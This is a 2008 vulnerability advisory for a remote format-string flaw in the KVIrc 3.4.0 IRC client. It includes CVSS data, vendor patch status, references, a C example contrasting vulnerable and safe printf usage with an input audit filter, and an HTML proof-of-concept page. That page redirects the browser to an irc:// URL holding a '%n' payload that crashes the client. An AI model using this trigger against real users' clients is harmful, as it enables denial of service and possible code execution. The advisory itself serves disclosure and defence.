KVIrc 3.4.0 Virgo Remote Format String Exploit PoC

2008-10-24 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS2: 7.6 High (AV:N/AC:H/Au:N/C:C/I:C/A:C)
  Attack Vector: NETWORK
  Attack Complexity: HIGH
  Authentication: NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE

AI Score: 7.8 High (Confidence: Low)

EPSS: 0.084 Low (Percentile: 94.5%)

Title: KVIrc 3.4.0 Virgo Remote Format String Exploit PoC
Advisory ID: ZSL-2008-4901
Type: Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 24.10.2008

Summary

KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit. KVIrc is being written by Szymon Stefanek and the KVIrc Development Team with the contribution of many IRC-addicted developers around the world.

Description

KVIrc is prone to a remote format-string vulnerability because the application fails to sanitize user-supplied input before passing it as the format-specifier argument of a formatted-printing function. A remote attacker may exploit this issue to execute arbitrary code with the privileges of the user running the affected application; failed exploit attempts crash the client (denial of service). The proof of concept below delivers the payload through the irc:// protocol handler: a web page redirects the browser to an irc:// URL containing a %n conversion, which the handler forwards to KVIrc.
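The two call shapes behind a bug of this class, side by side, with a small audit routine of the kind a client could run over an inbound URL or nickname before it reaches any printf-style function. This is an added example, not KVIrc code: `vuln_format`, `safe_format`, `audit_format` and `looks_like_format_attack` are names chosen here, and the payload string is the PoC's URL body with the scheme stripped.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable shape: the untrusted string *is* the format argument, so every
 * '%' in it is interpreted. Variadic wrapper so the call compiles cleanly. */
int vuln_format(char *out, size_t n, const char *user, ...)
{
    va_list ap;
    va_start(ap, user);
    int r = vsnprintf(out, n, user, ap);   /* user-controlled format string */
    va_end(ap);
    return r;
}

/* Hardened shape: literal format, the untrusted string is only data. */
int safe_format(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "%s", user);
}

typedef struct {
    int conversions;   /* arguments the string would pull off the stack */
    int has_n;         /* %n: writes the byte count through a pointer argument */
    int has_s_or_p;    /* %s / %p: dereference or disclose a pointer-sized slot */
    int malformed;     /* '%' not followed by a complete conversion */
} fmt_audit;

/* Walk the printf grammar: %[flags][width][.precision][length]conversion.
 * A "%%" pair is a literal percent sign and consumes nothing. */
fmt_audit audit_format(const char *s)
{
    fmt_audit a = {0, 0, 0, 0};
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')
            continue;                                   /* escaped '%' */
        while (*p && strchr("-+ #0'", *p))              /* flags */
            p++;
        if (*p == '*') { a.conversions++; p++; }        /* width from an arg */
        else while (*p >= '0' && *p <= '9') p++;
        if (*p == '.') {                                /* precision */
            p++;
            if (*p == '*') { a.conversions++; p++; }
            else while (*p >= '0' && *p <= '9') p++;
        }
        while (*p && strchr("hlLqjzt", *p))             /* length modifiers */
            p++;
        if (!*p) { a.malformed = 1; break; }            /* string ends mid-spec */
        if (strchr("diouxXeEfFgGaAcspn", *p)) {
            a.conversions++;
            if (*p == 'n') a.has_n = 1;
            if (*p == 's' || *p == 'p') a.has_s_or_p = 1;
        } else {
            a.malformed = 1;                            /* unknown conversion */
        }
    }
    return a;
}

/* Gatekeeper for an inbound irc:// URL or nickname: reject anything that
 * would expand to a conversion if it ever became a format string. */
int looks_like_format_attack(const char *s)
{
    fmt_audit a = audit_format(s);
    return a.conversions > 0 || a.malformed;
}

int main(void)
{
    char buf[64];
    const char *payload = "A:%n -i";   /* the PoC's URL body, minus irc:// */
    fmt_audit a = audit_format(payload);
    printf("'%s': %d conversion(s), %%n present=%d\n",
           payload, a.conversions, a.has_n);

    safe_format(buf, sizeof buf, payload);
    printf("safe_format -> \"%s\"\n", buf);      /* %n survives as plain text */

    /* A harmless input shows that the vulnerable shape interprets the
     * string: "%%" collapses to "%". With "%n" it would instead write through
     * whatever pointer-sized value sits in the next argument slot. */
    vuln_format(buf, sizeof buf, "100%% done");
    printf("vuln_format -> \"%s\"\n", buf);
    return 0;
}
```

The audit deliberately treats a dangling `%` and unknown conversions as suspicious rather than ignoring them: a filter that only looks for `%n` can be bypassed with width, precision and length modifiers (`%08lx`, `%.2s`, `%*d`), all of which still consume arguments and leak or corrupt state.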

Vendor

Szymon Stefanek - <http://www.kvirc.net>

Affected Version

3.4.0 Virgo

Tested On

Microsoft Windows XP Professional SP2 (English)

Vendor Status

[29.10.2008] Vendor has knowledge about the issue.
[04.11.2008] Vendor releases patch.

PoC

kvirc_fs.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://www.milw0rm.com/exploits/6832>
[2] <http://www.packetstormsecurity.org/filedesc/kvirc-format.txt.html>
[3] <http://www.sebug.net/exploit/4944>
[4] <http://www.securityfocus.com/bid/31912>
[5] <http://www.vupen.com/english/advisories/2008/2926>
[6] <http://www.secunia.com/advisories/32410>
[7] <http://www.juniper.net/security/auto/vulnerabilities/vuln31912.html>
[8] <https://vulners.com/cve/CVE-2008-4748>
[9] <http://xforce.iss.net/xforce/xfdb/46114>
[10] <http://it.com.mk/index.php/Gjoko-Krstikj/Sigurnost/KVIrc-v3.4.0-Virgo-Remote-Format-String-Exploit-PoC>
[11] <http://www.osvdb.org/show/osvdb/49352>

Changelog

[24.10.2008] - Initial release
[27.10.2008] - Added reference [10]
[29.10.2008] - Added Vendor Status
[04.11.2008] - Updated Vendor Status
[03.05.2012] - Added reference [11]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<!--

 KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

 Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
 KVIrc is being written by Szymon Stefanek and the KVIrc Development Team with
 the contribution of many IRC-addicted developers around the world.

 Product web page: http://www.kvirc.net/

 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

 liquidworm [t00t] gmail [d0t] com

 http://www.zeroscience.org

 24.10.2008

-->
<html>
<head><title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</title>
</head><body>
<center> <br/> <br/> <strong>Warning ! :)</strong> </center>
<script type="text/javascript">

alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");

// Trigger: navigating to an irc:// URL makes the browser hand it to the
// registered irc:// protocol handler, i.e. KVIrc 3.4.0. The "%n" inside the
// URL reaches a formatted-printing call as part of the format string; %n
// writes to memory, so the client crashes or, with a crafted string,
// executes attacker-supplied code.
function poc()
{
	window.location.href = "irc://A:%n -i";
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ)
{
	poc();
}
else
{
	window.location.href = "http://www.kvirc.net";
}

</script> </body></html>
